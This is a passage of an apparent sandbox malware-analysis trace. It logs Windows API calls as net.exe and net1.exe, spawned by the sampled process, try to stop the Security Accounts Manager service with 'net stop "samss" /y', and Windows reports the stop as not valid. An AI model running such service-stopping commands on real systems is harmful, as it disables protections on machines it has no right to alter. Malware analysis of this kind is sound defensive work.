_String2="TIMESOURCE") returned -1 [0222.928] _wcsicmp (_String1="SAMSS", _String2="AFP") returned 18 [0222.928] _wcsicmp (_String1="SAMSS", _String2="AFP") returned 18 [0222.928] _wcsicmp (_String1="SAMSS", _String2="UPS") returned -2 [0222.928] _wcsicmp (_String1="SAMSS", _String2="UPS") returned -2 [0222.928] _wcsicmp (_String1="SAMSS", _String2="XACTSRV") returned -5 [0222.928] _wcsicmp (_String1="SAMSS", _String2="XACTSRV") returned -5 [0222.928] _wcsicmp (_String1="SAMSS", _String2="TCPIP") returned -1 [0222.928] _wcsicmp (_String1="SAMSS", _String2="TCPIP") returned -1 [0222.928] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x27c0710 [0222.929] OpenServiceW (hSCManager=0x27c0710, lpServiceName="SAMSS", dwDesiredAccess=0x84) returned 0x27c07b0 [0222.929] ResolveDelayLoadedAPI () returned 0x73f29e60 [0222.930] ControlService (in: hService=0x27c07b0, dwControl=0x4, lpServiceStatus=0x267fa78 | out: lpServiceStatus=0x267fa78*(dwServiceType=0x20, dwCurrentState=0x4, dwControlsAccepted=0x0, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0222.930] LocalAlloc (uFlags=0x40, uBytes=0x28) returned 0x27b4468 [0222.930] wcscpy_s (in: _Destination=0x27b4484, _SizeInWords=0x6, _Source="SAMSS" | out: _Destination="SAMSS") returned 0x0 [0222.930] CloseServiceHandle (hSCObject=0x27c0710) returned 1 [0222.930] CloseServiceHandle (hSCObject=0x27c07b0) returned 1 [0222.931] NetApiBufferAllocate (in: ByteCount=0x1e0, Buffer=0x267fa5c | out: Buffer=0x267fa5c*=0x27c02d0) returned 0x0 [0222.931] _wcsicmp (_String1="SAMSS", _String2="WORKSTATION") returned -4 [0222.931] _wcsicmp (_String1="SAMSS", _String2="LanmanWorkstation") returned 7 [0222.931] _wcsicmp (_String1="SAMSS", _String2="SERVER") returned -4 [0222.931] _wcsicmp (_String1="SAMSS", _String2="LanmanServer") returned 7 [0222.931] _wcsicmp (_String1="SAMSS", _String2="BROWSER") returned 17 [0222.931] _wcsicmp (_String1="SAMSS", _String2="BROWSER") returned 17 [0222.931] _wcsicmp (_String1="SAMSS", _String2="MESSENGER") returned 6 [0222.931] _wcsicmp (_String1="SAMSS", _String2="MESSENGER") returned 6 [0222.931] _wcsicmp (_String1="SAMSS", _String2="NETRUN") returned 5 [0222.931] _wcsicmp (_String1="SAMSS", _String2="NETRUN") returned 5 [0222.931] _wcsicmp (_String1="SAMSS", _String2="SPOOLER") returned -15 [0222.931] _wcsicmp (_String1="SAMSS", _String2="SPOOLER") returned -15 [0222.931] _wcsicmp (_String1="SAMSS", _String2="ALERTER") returned 18 [0222.931] _wcsicmp (_String1="SAMSS", _String2="ALERTER") returned 18 [0222.931] _wcsicmp (_String1="SAMSS", _String2="NETLOGON") returned 5 [0222.931] _wcsicmp (_String1="SAMSS", _String2="NETLOGON") returned 5 [0222.931] _wcsicmp (_String1="SAMSS", _String2="NETPOPUP") returned 5 [0222.931] _wcsicmp (_String1="SAMSS", _String2="NETPOPUP") returned 5 [0222.931] _wcsicmp (_String1="SAMSS", _String2="SQLSERVER") returned -16 [0222.931] _wcsicmp (_String1="SAMSS", _String2="SQLSERVER") returned -16 [0222.931] _wcsicmp (_String1="SAMSS", _String2="REPLICATOR") returned 1 [0222.931] _wcsicmp (_String1="SAMSS", _String2="REPLICATOR") returned 1 [0222.931] _wcsicmp (_String1="SAMSS", _String2="REMOTEBOOT") returned 1 [0222.931] _wcsicmp (_String1="SAMSS", _String2="REMOTEBOOT") returned 1 [0222.931] _wcsicmp (_String1="SAMSS", _String2="TIMESOURCE") returned -1 [0222.931] _wcsicmp (_String1="SAMSS", _String2="TIMESOURCE") returned -1 [0222.931] _wcsicmp (_String1="SAMSS", _String2="AFP") returned 18 [0222.931] _wcsicmp (_String1="SAMSS", _String2="AFP") returned 18 [0222.931] _wcsicmp (_String1="SAMSS", _String2="UPS") returned -2 [0222.931] _wcsicmp (_String1="SAMSS", _String2="UPS") returned -2 [0222.932] _wcsicmp (_String1="SAMSS", _String2="XACTSRV") returned -5 [0222.932] _wcsicmp (_String1="SAMSS", _String2="XACTSRV") returned -5 [0222.932] _wcsicmp (_String1="SAMSS", _String2="TCPIP") returned -1 [0222.932] _wcsicmp (_String1="SAMSS", _String2="TCPIP") returned -1 [0222.932] wcsncpy_s (in: _Destination=0x27c04a4, _SizeInWords=0x6, _Source="SAMSS", _MaxCount=0x5 | out: _Destination="SAMSS") returned 0x0 [0222.932] wcsncpy_s (in: _Destination=0x27c0498, _SizeInWords=0x6, _Source="SAMSS", _MaxCount=0x5 | out: _Destination="SAMSS") returned 0x0 [0222.932] NetApiBufferFree (Buffer=0x27b4468) returned 0x0 [0222.932] NetApiBufferAllocate (in: ByteCount=0xfa0, Buffer=0x267f97c | out: Buffer=0x267f97c*=0x27c1ff0) returned 0x0 [0222.932] OpenServiceW (hSCManager=0x27c0760, lpServiceName="SAMSS", dwDesiredAccess=0xc) returned 0x27c0648 [0222.932] QueryServiceStatus (in: hService=0x27c0648, lpServiceStatus=0x267f980 | out: lpServiceStatus=0x267f980*(dwServiceType=0x20, dwCurrentState=0x4, dwControlsAccepted=0x0, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0222.932] NetApiBufferFree (Buffer=0x27c1ff0) returned 0x0 [0222.933] CloseServiceHandle (hSCObject=0x27c0648) returned 1 [0222.933] wcscpy_s (in: _Destination=0x2c7610, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0222.933] LoadLibraryExW (lpLibFileName="NETMSG", hFile=0x0, dwFlags=0x20) returned 0x2680002 [0222.933] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x2680002, dwMessageId=0x88f, dwLanguageId=0x0, lpBuffer=0x2c7c20, nSize=0x800, Arguments=0x2c73d0 | out: lpBuffer="The requested pause, continue, or stop is not valid for this service.\r\n") returned 0x47 [0222.934] GetFileType (hFile=0x94) returned 0x2 [0222.934] GetConsoleMode (in: hConsoleHandle=0x94, lpMode=0x267f8b8 | out: lpMode=0x267f8b8) returned 1 [0223.147] WriteConsoleW (in: hConsoleOutput=0x94, lpBuffer=0x2c7c20*, nNumberOfCharsToWrite=0x47, lpNumberOfCharsWritten=0x267f8c4, lpReserved=0x0 | out: lpBuffer=0x2c7c20*, lpNumberOfCharsWritten=0x267f8c4*=0x47) returned 1 [0223.466] GetFileType (hFile=0x94) returned 0x2 [0223.467] GetConsoleMode (in: hConsoleHandle=0x94, lpMode=0x267f8b8 | out: lpMode=0x267f8b8) returned 1 [0223.864] WriteConsoleW (in: hConsoleOutput=0x94, lpBuffer=0x2a12e4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x267f8c4, lpReserved=0x0 | out: lpBuffer=0x2a12e4*, lpNumberOfCharsWritten=0x267f8c4*=0x2) returned 1 [0224.378] _ultow (in: _Dest=0x88f, _Radix=40368396 | out: _Dest=0x88f) returned="2191" [0224.378] FormatMessageW (in: dwFlags=0x2800, lpSource=0x2680002, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x2c7c20, nSize=0x800, Arguments=0x2c73d0 | out: lpBuffer="More help is available by typing NET HELPMSG 2191.\r\n") returned 0x34 [0224.378] GetFileType (hFile=0x94) returned 0x2 [0224.378] GetConsoleMode (in: hConsoleHandle=0x94, lpMode=0x267f8dc | out: lpMode=0x267f8dc) returned 1 [0224.734] WriteConsoleW (in: hConsoleOutput=0x94, lpBuffer=0x2c7c20*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x267f8e8, lpReserved=0x0 | out: lpBuffer=0x2c7c20*, lpNumberOfCharsWritten=0x267f8e8*=0x34) returned 1 [0225.202] GetFileType (hFile=0x94) returned 0x2 [0225.202] GetConsoleMode (in: hConsoleHandle=0x94, lpMode=0x267f8dc | out: lpMode=0x267f8dc) returned 1 [0225.551] WriteConsoleW (in: hConsoleOutput=0x94, lpBuffer=0x2a12e4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x267f8e8, lpReserved=0x0 | out: lpBuffer=0x2a12e4*, lpNumberOfCharsWritten=0x267f8e8*=0x2) returned 1 [0226.079] NetApiBufferFree (Buffer=0x27b83c8) returned 0x0 [0226.079] NetApiBufferFree (Buffer=0x27b8470) returned 0x0 [0226.079] GetCommandLineW () returned="C:\\WINDOWS\\system32\\net1 stop \"samss\" /y" [0226.079] exit (_Code=2) Thread: id = 8266 os_tid = 0x8cf8 Process: id = "52" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5fe75000" os_pid = "0xd628" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xea0" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop \"samss\" /y" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 13015 os_tid = 0xd62c Thread: id = 13098 os_tid = 0xd780 Process: id = "53" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x555ee000" os_pid = "0xd648" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "52" os_parent_pid = "0xd628" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 13022 os_tid = 0xd64c Thread: id = 13027 os_tid = 0xd660 Thread: id = 13042 os_tid = 0xd69c Thread: id = 13073 os_tid = 0xd718 Thread: id = 13074 os_tid = 0xd71c Process: id = "54" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x6b17b000" os_pid = "0x4098" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "52" os_parent_pid = "0xd628" cmd_line = "C:\\WINDOWS\\system32\\net1 stop \"samss\" /y" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 13138 os_tid = 0x1834 [0267.364] GetModuleHandleA (lpModuleName=0x0) returned 0x2a0000 [0267.364] __set_app_type (_Type=0x1) [0267.365] __p__fmode () returned 0x76953c14 [0267.365] __p__commode () returned 0x769549ec [0267.365] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x2a6f20) returned 0x0 [0267.365] __getmainargs (in: _Argc=0x2bf608, _Argv=0x2bf60c, _Env=0x2bf610, _DoWildCard=0, _StartInfo=0x2bf61c | out: _Argc=0x2bf608, _Argv=0x2bf60c, _Env=0x2bf610) returned 0 [0267.365] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0267.365] GetConsoleOutputCP () returned 0x1b5 [0267.691] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x2c6fa0 | out: lpCPInfo=0x2c6fa0) returned 1 [0267.691] SetThreadUILanguage (LangId=0x0) returned 0x2e20409 [0268.185] sprintf_s (in: _DstBuf=0x30efc5c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0268.185] setlocale (category=0, locale=".437") returned="English_United States.437" [0268.187] GetStdHandle (nStdHandle=0xfffffff5) returned 0x90 [0268.187] GetStdHandle (nStdHandle=0xfffffff4) returned 0x94 [0268.187] GetCommandLineW () returned="C:\\WINDOWS\\system32\\net1 stop \"samss\" /y" [0268.187] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x30efa04, nSize=0x104 | out: lpFilename="C:\\WINDOWS\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0268.187] RtlAllocateHeap (HeapHandle=0x3130000, Flags=0x0, Size=0x5e) returned 0x3134230 [0268.187] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0268.187] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x30efa00 | out: Buffer=0x30efa00*=0x31384a0) returned 0x0 [0268.187] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x30ef9fc | out: Buffer=0x30ef9fc*=0x31384b8) returned 0x0 [0268.187] __iob_func () returned 0x76952608 [0268.187] _fileno (_File=0x76952608) returned 0 [0268.187] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0268.187] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0268.187] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0268.187] _wcsicmp (_String1="config", _String2="stop") returned -16 [0268.188] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0268.188] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0268.188] _wcsicmp (_String1="file", _String2="stop") returned -13 [0268.188] _wcsicmp (_String1="files", _String2="stop") returned -13 [0268.188] _wcsicmp (_String1="group", _String2="stop") returned -12 [0268.188] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0268.188] _wcsicmp (_String1="help", _String2="stop") returned -11 [0268.188] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0268.188] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0268.188] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0268.188] _wcsicmp (_String1="session", _String2="stop") returned -15 [0268.188] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0268.188] _wcsicmp (_String1=0x2a1ffc, _String2="stop") returned -15 [0268.188] _wcsicmp (_String1="share", _String2="stop") returned -12 [0268.188] _wcsicmp (_String1="start", _String2="stop") returned -14 [0268.188] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0268.188] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0268.188] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0268.188] _wcsicmp (_String1="accounts", _String2="samss") returned -18 [0268.188] _wcsicmp (_String1="computer", _String2="samss") returned -16 [0268.188] _wcsicmp (_String1="config", _String2="samss") returned -16 [0268.188] _wcsicmp (_String1="continue", _String2="samss") returned -16 [0268.188] _wcsicmp (_String1="cont", _String2="samss") returned -16 [0268.188] _wcsicmp (_String1="file", _String2="samss") returned -13 [0268.188] _wcsicmp (_String1="files", _String2="samss") returned -13 [0268.188] _wcsicmp (_String1="group", _String2="samss") returned -12 [0268.188] _wcsicmp (_String1="groups", _String2="samss") returned -12 [0268.188] _wcsicmp (_String1="help", _String2="samss") returned -11 [0268.188] _wcsicmp (_String1="helpmsg", _String2="samss") returned -11 [0268.188] _wcsicmp (_String1="localgroup", _String2="samss") returned -7 [0268.188] _wcsicmp (_String1="pause", _String2="samss") returned -3 [0268.188] _wcsicmp (_String1="session", _String2="samss") returned 4 [0268.188] _wcsicmp (_String1="sessions", _String2="samss") returned 4 [0268.188] _wcsicmp (_String1="sess", _String2="samss") returned 4 [0268.188] _wcsicmp (_String1="share", _String2="samss") returned 7 [0268.189] _wcsicmp (_String1="start", _String2="samss") returned 19 [0268.189] _wcsicmp (_String1="stats", _String2="samss") returned 19 [0268.189] _wcsicmp (_String1="statistics", _String2="samss") returned 19 [0268.189] _wcsicmp (_String1="stop", _String2="samss") returned 19 [0268.189] _wcsicmp (_String1="time", _String2="samss") returned 1 [0268.189] _wcsicmp (_String1="user", _String2="samss") returned 2 [0268.189] _wcsicmp (_String1="users", _String2="samss") returned 2 [0268.189] _wcsicmp (_String1="msg", _String2="samss") returned -6 [0268.189] _wcsicmp (_String1="messenger", _String2="samss") returned -6 [0268.189] _wcsicmp (_String1="receiver", _String2="samss") returned -1 [0268.189] _wcsicmp (_String1="rcv", _String2="samss") returned -1 [0268.189] _wcsicmp (_String1="netpopup", _String2="samss") returned -5 [0268.189] _wcsicmp (_String1="redirector", _String2="samss") returned -1 [0268.189] _wcsicmp (_String1="redir", _String2="samss") returned -1 [0268.189] _wcsicmp (_String1="rdr", _String2="samss") returned -1 [0268.189] _wcsicmp (_String1="workstation", _String2="samss") returned 4 [0268.189] _wcsicmp (_String1="work", _String2="samss") returned 4 [0268.189] _wcsicmp (_String1="wksta", _String2="samss") returned 4 [0268.189] _wcsicmp (_String1="prdr", _String2="samss") returned -3 [0268.189] _wcsicmp (_String1="devrdr", _String2="samss") returned -15 [0268.189] _wcsicmp (_String1="lanmanworkstation", _String2="samss") returned -7 [0268.189] _wcsicmp (_String1="server", _String2="samss") returned 4 [0268.189] _wcsicmp (_String1="svr", _String2="samss") returned 21 [0268.189] _wcsicmp (_String1="srv", _String2="samss") returned 17 [0268.189] _wcsicmp (_String1="lanmanserver", _String2="samss") returned -7 [0268.189] _wcsicmp (_String1="alerter", _String2="samss") returned -18 [0268.189] _wcsicmp (_String1="netlogon", _String2="samss") returned -5 [0268.189] _wcsupr (in: _String="samss" | out: _String="SAMSS") returned="SAMSS" [0268.189] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x31405f8 [0268.193] GetServiceKeyNameW (in: hSCManager=0x31405f8, lpDisplayName="SAMSS", lpServiceName=0x2c8c28, lpcchBuffer=0x30ef974 | out: lpServiceName="", lpcchBuffer=0x30ef974) returned 0 [0268.194] _wcsicmp (_String1="msg", _String2="SAMSS") returned -6 [0268.194] _wcsicmp (_String1="messenger", _String2="SAMSS") returned -6 [0268.194] _wcsicmp (_String1="receiver", _String2="SAMSS") returned -1 [0268.194] _wcsicmp (_String1="rcv", _String2="SAMSS") returned -1 [0268.194] _wcsicmp (_String1="redirector", _String2="SAMSS") returned -1 [0268.194] _wcsicmp (_String1="redir", _String2="SAMSS") returned -1 [0268.194] _wcsicmp (_String1="rdr", _String2="SAMSS") returned -1 [0268.194] _wcsicmp (_String1="workstation", _String2="SAMSS") returned 4 [0268.194] _wcsicmp (_String1="work", _String2="SAMSS") returned 4 [0268.194] _wcsicmp (_String1="wksta", _String2="SAMSS") returned 4 [0268.194] _wcsicmp (_String1="prdr", _String2="SAMSS") returned -3 [0268.194] _wcsicmp (_String1="devrdr", _String2="SAMSS") returned -15 [0268.194] _wcsicmp (_String1="lanmanworkstation", _String2="SAMSS") returned -7 [0268.194] _wcsicmp (_String1="server", _String2="SAMSS") returned 4 [0268.194] _wcsicmp (_String1="svr", _String2="SAMSS") returned 21 [0268.194] _wcsicmp (_String1="srv", _String2="SAMSS") returned 17 [0268.194] _wcsicmp (_String1="lanmanserver", _String2="SAMSS") returned -7 [0268.194] _wcsicmp (_String1="alerter", _String2="SAMSS") returned -18 [0268.194] _wcsicmp (_String1="netlogon", _String2="SAMSS") returned -5 [0268.194] _wcsicmp (_String1="SAMSS", _String2="WORKSTATION") returned -4 [0268.194] _wcsicmp (_String1="SAMSS", _String2="LanmanWorkstation") returned 7 [0268.194] _wcsicmp (_String1="SAMSS", _String2="SERVER") returned -4 [0268.194] _wcsicmp (_String1="SAMSS", _String2="LanmanServer") returned 7 [0268.194] _wcsicmp (_String1="SAMSS", _String2="BROWSER") returned 17 [0268.194] _wcsicmp (_String1="SAMSS", _String2="BROWSER") returned 17 [0268.195] _wcsicmp (_String1="SAMSS", _String2="MESSENGER") returned 6 [0268.195] _wcsicmp (_String1="SAMSS", _String2="MESSENGER") returned 6 [0268.195] _wcsicmp (_String1="SAMSS", _String2="NETRUN") returned 5 [0268.195] _wcsicmp (_String1="SAMSS", _String2="NETRUN") returned 5 [0268.195] _wcsicmp (_String1="SAMSS", _String2="SPOOLER") returned -15 [0268.195] _wcsicmp (_String1="SAMSS", _String2="SPOOLER") returned -15 [0268.195] _wcsicmp (_String1="SAMSS", _String2="ALERTER") returned 18 [0268.195] _wcsicmp (_String1="SAMSS", _String2="ALERTER") returned 18 [0268.195] _wcsicmp (_String1="SAMSS", _String2="NETLOGON") returned 5 [0268.195] _wcsicmp (_String1="SAMSS", _String2="NETLOGON") returned 5 [0268.195] _wcsicmp (_String1="SAMSS", _String2="NETPOPUP") returned 5 [0268.195] _wcsicmp (_String1="SAMSS", _String2="NETPOPUP") returned 5 [0268.195] _wcsicmp (_String1="SAMSS", _String2="SQLSERVER") returned -16 [0268.195] _wcsicmp (_String1="SAMSS", _String2="SQLSERVER") returned -16 [0268.195] _wcsicmp (_String1="SAMSS", _String2="REPLICATOR") returned 1 [0268.195] _wcsicmp (_String1="SAMSS", _String2="REPLICATOR") returned 1 [0268.195] _wcsicmp (_String1="SAMSS", _String2="REMOTEBOOT") returned 1 [0268.195] _wcsicmp (_String1="SAMSS", _String2="REMOTEBOOT") returned 1 [0268.195] _wcsicmp (_String1="SAMSS", _String2="TIMESOURCE") returned -1 [0268.195] _wcsicmp (_String1="SAMSS", _String2="TIMESOURCE") returned -1 [0268.195] _wcsicmp (_String1="SAMSS", _String2="AFP") returned 18 [0268.195] _wcsicmp (_String1="SAMSS", _String2="AFP") returned 18 [0268.195] _wcsicmp (_String1="SAMSS", _String2="UPS") returned -2 [0268.195] _wcsicmp (_String1="SAMSS", _String2="UPS") returned -2 [0268.195] _wcsicmp (_String1="SAMSS", _String2="XACTSRV") returned -5 [0268.195] _wcsicmp (_String1="SAMSS", _String2="XACTSRV") returned -5 [0268.195] _wcsicmp (_String1="SAMSS", _String2="TCPIP") returned -1 [0268.195] _wcsicmp (_String1="SAMSS", _String2="TCPIP") returned -1 [0268.195] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x31408a0 [0268.196] OpenServiceW (hSCManager=0x31408a0, lpServiceName="SAMSS", dwDesiredAccess=0x84) returned 0x3140878 [0268.196] ResolveDelayLoadedAPI () returned 0x73f29e60 [0268.196] ControlService (in: hService=0x3140878, dwControl=0x4, lpServiceStatus=0x30ef8f0 | out: lpServiceStatus=0x30ef8f0*(dwServiceType=0x20, dwCurrentState=0x4, dwControlsAccepted=0x0, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0268.197] LocalAlloc (uFlags=0x40, uBytes=0x28) returned 0x3134468 [0268.197] wcscpy_s (in: _Destination=0x3134484, _SizeInWords=0x6, _Source="SAMSS" | out: _Destination="SAMSS") returned 0x0 [0268.197] CloseServiceHandle (hSCObject=0x31408a0) returned 1 [0268.197] CloseServiceHandle (hSCObject=0x3140878) returned 1 [0268.198] NetApiBufferAllocate (in: ByteCount=0x1e0, Buffer=0x30ef8d4 | out: Buffer=0x30ef8d4*=0x31402d0) returned 0x0 [0268.198] _wcsicmp (_String1="SAMSS", _String2="WORKSTATION") returned -4 [0268.198] _wcsicmp (_String1="SAMSS", _String2="LanmanWorkstation") returned 7 [0268.198] _wcsicmp (_String1="SAMSS", _String2="SERVER") returned -4 [0268.198] _wcsicmp (_String1="SAMSS", _String2="LanmanServer") returned 7 [0268.198] _wcsicmp (_String1="SAMSS", _String2="BROWSER") returned 17 [0268.198] _wcsicmp (_String1="SAMSS", _String2="BROWSER") returned 17 [0268.198] _wcsicmp (_String1="SAMSS", _String2="MESSENGER") returned 6 [0268.198] _wcsicmp (_String1="SAMSS", _String2="MESSENGER") returned 6 [0268.198] _wcsicmp (_String1="SAMSS", _String2="NETRUN") returned 5 [0268.198] _wcsicmp (_String1="SAMSS", _String2="NETRUN") returned 5 [0268.198] _wcsicmp (_String1="SAMSS", _String2="SPOOLER") returned -15 [0268.198] _wcsicmp (_String1="SAMSS", _String2="SPOOLER") returned -15 [0268.198] _wcsicmp (_String1="SAMSS", _String2="ALERTER") returned 18 [0268.198] _wcsicmp (_String1="SAMSS", _String2="ALERTER") returned 18 [0268.198] _wcsicmp (_String1="SAMSS", _String2="NETLOGON") returned 5 [0268.198] _wcsicmp (_String1="SAMSS", _String2="NETLOGON") returned 5 [0268.198] _wcsicmp (_String1="SAMSS", _String2="NETPOPUP") returned 5 [0268.198] _wcsicmp (_String1="SAMSS", _String2="NETPOPUP") returned 5 [0268.198] _wcsicmp (_String1="SAMSS", _String2="SQLSERVER") returned -16 [0268.198] _wcsicmp (_String1="SAMSS", _String2="SQLSERVER") returned -16 [0268.198] _wcsicmp (_String1="SAMSS", _String2="REPLICATOR") returned 1 [0268.198] _wcsicmp (_String1="SAMSS", _String2="REPLICATOR") returned 1 [0268.198] _wcsicmp (_String1="SAMSS", _String2="REMOTEBOOT") returned 1 [0268.198] _wcsicmp (_String1="SAMSS", _String2="REMOTEBOOT") returned 1 [0268.198] _wcsicmp (_String1="SAMSS", _String2="TIMESOURCE") returned -1 [0268.198] _wcsicmp (_String1="SAMSS", _String2="TIMESOURCE") returned -1 [0268.198] _wcsicmp (_String1="SAMSS", _String2="AFP") returned 18 [0268.198] _wcsicmp (_String1="SAMSS", _String2="AFP") returned 18 [0268.198] _wcsicmp (_String1="SAMSS", _String2="UPS") returned -2 [0268.198] _wcsicmp (_String1="SAMSS", _String2="UPS") returned -2 [0268.198] _wcsicmp (_String1="SAMSS", _String2="XACTSRV") returned -5 [0268.198] _wcsicmp (_String1="SAMSS", _String2="XACTSRV") returned -5 [0268.198] _wcsicmp (_String1="SAMSS", _String2="TCPIP") returned -1 [0268.198] _wcsicmp (_String1="SAMSS", _String2="TCPIP") returned -1 [0268.198] wcsncpy_s (in: _Destination=0x31404a4, _SizeInWords=0x6, _Source="SAMSS", _MaxCount=0x5 | out: _Destination="SAMSS") returned 0x0 [0268.199] wcsncpy_s (in: _Destination=0x3140498, _SizeInWords=0x6, _Source="SAMSS", _MaxCount=0x5 | out: _Destination="SAMSS") returned 0x0 [0268.199] NetApiBufferFree (Buffer=0x3134468) returned 0x0 [0268.199] NetApiBufferAllocate (in: ByteCount=0xfa0, Buffer=0x30ef7f4 | out: Buffer=0x30ef7f4*=0x3141ff0) returned 0x0 [0268.199] OpenServiceW (hSCManager=0x31405f8, lpServiceName="SAMSS", dwDesiredAccess=0xc) returned 0x31406e8 [0268.199] QueryServiceStatus (in: hService=0x31406e8, lpServiceStatus=0x30ef7f8 | out: lpServiceStatus=0x30ef7f8*(dwServiceType=0x20, dwCurrentState=0x4, dwControlsAccepted=0x0, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0268.200] NetApiBufferFree (Buffer=0x3141ff0) returned 0x0 [0268.200] CloseServiceHandle (hSCObject=0x31406e8) returned 1 [0268.200] wcscpy_s (in: _Destination=0x2c7610, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0268.200] LoadLibraryExW (lpLibFileName="NETMSG", hFile=0x0, dwFlags=0x20) returned 0x3120002 [0268.201] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x3120002, dwMessageId=0x88f, dwLanguageId=0x0, lpBuffer=0x2c7c20, nSize=0x800, Arguments=0x2c73d0 | out: lpBuffer="The requested pause, continue, or stop is not valid for this service.\r\n") returned 0x47 [0268.201] GetFileType (hFile=0x94) returned 0x2 [0268.201] GetConsoleMode (in: hConsoleHandle=0x94, lpMode=0x30ef730 | out: lpMode=0x30ef730) returned 1 [0268.659] WriteConsoleW (in: hConsoleOutput=0x94, lpBuffer=0x2c7c20*, nNumberOfCharsToWrite=0x47, lpNumberOfCharsWritten=0x30ef73c, lpReserved=0x0 | out: lpBuffer=0x2c7c20*, lpNumberOfCharsWritten=0x30ef73c*=0x47) returned 1 [0268.982] GetFileType (hFile=0x94) returned 0x2 [0268.982] GetConsoleMode (in: hConsoleHandle=0x94, lpMode=0x30ef730 | out: lpMode=0x30ef730) returned 1 [0269.429] WriteConsoleW (in: hConsoleOutput=0x94, lpBuffer=0x2a12e4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x30ef73c, lpReserved=0x0 | out: lpBuffer=0x2a12e4*, lpNumberOfCharsWritten=0x30ef73c*=0x2) returned 1 [0269.903] _ultow (in: _Dest=0x88f, _Radix=51312516 | out: _Dest=0x88f) 